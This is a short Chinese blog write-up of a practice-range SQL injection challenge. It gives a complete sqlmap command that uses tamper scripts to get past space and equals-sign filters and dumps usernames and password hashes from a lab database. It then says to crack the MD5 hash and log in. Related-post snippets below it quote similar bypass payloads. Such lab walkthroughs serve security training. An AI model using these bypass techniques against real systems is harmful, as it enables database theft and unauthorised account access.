360众测靶场题库之64- SQL过滤字符后手工注入漏洞测试(第1题)

于 2024-03-11 17:07:18 发布
阅读量256 收藏
点赞数 2
分类专栏: 360众测靶场题库 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjl12344/article/details/136628916
版权

经过测试,确定注入点在维护界面的URL链接的id参数中,并且后台有关键字以及特殊字符的过滤,等号以及空格被过滤,要做URL编码绕过。

sqlmap注入:

上sqlmap前,要先了解SQLMAP的绕过脚本使用,这题中使用到了三个绕过脚本:

1.charencode脚本:URL编码脚本;

2.equaltolike脚本:将等号转换为like脚本;

3.space2comment脚本:空格绕过脚本。

payload:

python sqlmap.py -u "http://219.153.49.228:44260/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member -C 'status,name,password' --dump --batch

将status为1的密码MD5解密一下即可得到登录密码,接着登录拿key~

BugBounty
关注
专栏目录
网安知识系列:网络安全ctf比赛_学习资源整理,解工具、比赛时间、解思路、实战靶场、学习路线,推荐收藏!...
weixin_54626591的博客
09-12 328
网络安全ctf比赛_学习资源整理,解工具、比赛时间、解思路、实战靶场、学习路线,推荐收藏!...
SQL过滤字符手工注入漏洞测试(第1)
weixin_30240349的博客
04-23 141
https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe 分析目,属于时间盲注,这种情况,通常使用sqlmap 直接注入就行了,手动语法太复杂了!!! sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --ta...
笔记:SQL过滤字符手工注入漏洞测试(第1)
m0_67399862的博客
05-26 538
一打开网页时,发现正常打and 1=1的语句都被过滤了 考虑空格被过滤 将空格用/**/表示转换为URL时,发现语句仍报错,考虑有可能是等号被过滤 将=用like表示转换为URL 相当于输入了and 1=1的语句,页面正常 相当于输入了and 1=2的语句,发现页面报错,说明有SQL注入 用order by语句查询字段数 说明字段数只有4个 发现语句没有拼接在一起 将id=1改为id=-1 接下来按常规的爆库,爆表,...
0x2F.SQL过滤字符手工注入漏洞测试(第1)
qq_31679787的博客
11-14 1017
经过测试,发现空格,符号等都被过滤,所以通过替换被过滤的符号并且进行url编码后才能继续注入测试列数; /**/order/**/by/**/5# %2f%2a%2a%2f%6f%72%64%65%72%2f%2a%2a%2f%62%79%2f%2a%2a%2f%35%23 以下级联查询需将id=1改为id=-1,才能显示级联后的查询内容; 测试显位点; /**/union/*...
墨者靶场-SQL过滤字符手工注入漏洞测试(第1)
shy的博客
11-15 324
墨者学习 By/shy014 进去首页又看到熟悉的公告 通过简单的测试,确定存在sql注入漏洞,但是输入and 1=1 ,and 1=2,order by,union select ,and都没...
cisp-pte基础目之SQL注入
weixin_53313406的博客
11-25 3045
cisp-pte基础目之SQL注入(超详细)
2021Web安全面试大全(附答案详解)看完稳了
热门推荐
m0_59991869的博客
10-13 1万+
人人都有一个进大厂的梦想,而进大厂的门槛也可想而知,所以这里整理了一份安全大厂的面试大全,看完文章如果对你有帮助的话希望能够点赞+收藏+关注!感谢! 本篇文章对于学习Web安全的朋友来说应该是目前最全面的面试合集了,后续也会陆续更新其他大厂的面试目和知识点。另外我还整理了许多关于Web安全的学习资料+工具包等等,需要的点击Web安全学习 一、渗透测试面试,包含大量渗透技巧 1.拿到一个待检测的站,你觉得应该先做什么? a、信息收集 1、获取域名的whois信息,获取注册者邮箱姓名电话等,丢
ctf 选择 题库_CTF 试初体验
weixin_39576066的博客
12-19 2077
被逗哥(@Hustcw)安利了一波 CTF 赛,作为萌新我决定找点目练练手。什么是 CTF?CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。CTF 主要...
内网安全-隧道穿透漫游
m0_67105288的博客
02-23 660
隧道穿透与端口转发 什么是隧道? 在渗透测试中,进入内网后,我们要判断流量是否能够出的去、进的来。 在实际的网络情况下,流量会经过很多的边界设备,在一般的企业内网中,可能会存在 IDP、IPS、防火墙等设备,如果异常的话,就会直接将通信阻断;这里我们说的隧道,就是绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方通信。当被封装的数据包达到了另外的地址的时候,解包还原,并将还原后的数据包发送到相应的服务器上。 常见的隧道包括三个大类:网络层、应用
墨者 - SQL过滤字符手工注入漏洞测试(第1)
吃肉唐僧的博客
07-04 1358
一开始使用order by,union select ,and 字段,发现返回并没有变化。 推测这些字段是已经过滤掉了 后来,上网查询后发现 ,不但这些字段过滤,还有空格和‘=’也被过滤掉了 所以‘=’可以用Like 替代,空格用/**/,url 要编码转义 在这里有个坑,花了我不少时间 一般url都是用在线url解码,例如:https://tool.chinaz.com/tool...
墨者学院-SQL过滤字符手工注入漏洞测试(第1)
weixin_38131137的博客
03-01 161
一试验就清楚是被过滤了,在这里有几点提示的 1、如果是空格、=的过滤,用/**/ 与 like替换 2、这里里面有坑,百度后才发现,url编码存在简单模式和复杂模式 3、下载个小葵,或者用编码网站http://web.chacuo.net/charseturlencode 4、后续发现再补 ...
墨者学院SQL过滤字符手工注入漏洞测试(第1)
痴人说梦梦中人
11-13 321
1、 我也没想到那么多弯弯绕绕的,看到评论区有提示,就照做了,编写url编码脚本,获取注入payload,测试回显位置。 #!/usr/bin/env python # -*- coding:UTF-8 -*- #time:2019/11/9 1:03 #author:White9527 from urllib import parse import re #查询语句 s1 = """ord...
墨者SQL过滤字符手工注入漏洞测试(第1)
wswr的博客
03-12 1956
思路:注入嘛,那就是该试的都试试,然后你会发现单引号页面跳转了虽然没有和之前一样有sql报错什么的,而且空格order,by ,select什么的字符都被过滤 那么就是要用url编码的方式去绕过滤,值得注意的是空格用/**/代替,=用like代替 简单说就是和正常注入的不同的地方就是每一步注入的代码都要换成url编码的形式再去注入,然后就和正常注入没什么区别了 ps:这里其实一开始我也没什么思路的QAQ,然后就无脑sqlmap了,后面会发现sqlmap抛出来的账号密码都不行,所以还是得手注可恶 总结
墨者-SQL过滤字符手工注入漏洞测试(第1)
zr1213159840的博客
12-10 847
和以前的简单目一样,看目的提示以及自己的测试知道过滤了=,–+,空格符号。等于可以使用like进行替代,空格可以使用/**/进行替代。最主要的,感觉目给了误解,没有说准确,目说url加密,但是经过测试直接选在网上选择url加密的链接并不行,最后测试是url网址16进制加密才可以,链接如下 url16进制加密 下面开始正式步骤: 首先是测试是否存在注入,将id=1改成id=2,没得显示,可能存在漏洞。 然后我们再测试下id=1 and 1=1和and 1=2行不行,需要注意的是,需要对空格以及=进
墨者学院—SQL过滤字符手工注入漏洞测试
没事我溜达
03-16 1218
靶场地址: SQL过滤字符手工注入漏洞测试(第1)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 关于CTFHUB中的sql注入以及文件上传知识点我们已经学习过一遍了,如果大家都掌握的话,那我们也算是过了入门这个关了。 今天来学习墨者学院中的字符过滤靶场 我们打开靶场 我们进到靶场看到一个登录页面 看到这我也是很激动呀,打开BP就是一顿爆破,结果没爆破出来.. 然后仔细看到下方有个导航条我我们点进去 注意看这个URL,我就怀疑注入点在这里,然后打开.
记21年某次360众测考核记录
Love&Share
09-23 3392
目分为两部分: 选择:单选,多选,判断 实操:10个 时间:三个小时 可能会有的目 登录框sql盲注,直接登录 PHPMailer远程命令执行漏洞 实操是墨者学院的,而且拿到的key也有mozhe字样,可以提前去玩玩 key一般在根目录下的key.txt或者key***.php 全程必须挂着VPN 选择 这是我当时做的,不一定正确 实操1 svn泄露 实操2 抓包改referer 实操3 前端弱口令,源码审计 $username=“admin”; $password
360众测靶场题库之56-SQL注入漏洞测试(时间盲注)
最新发布
zjl12344的博客
03-10 209
360众测靶场题库
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值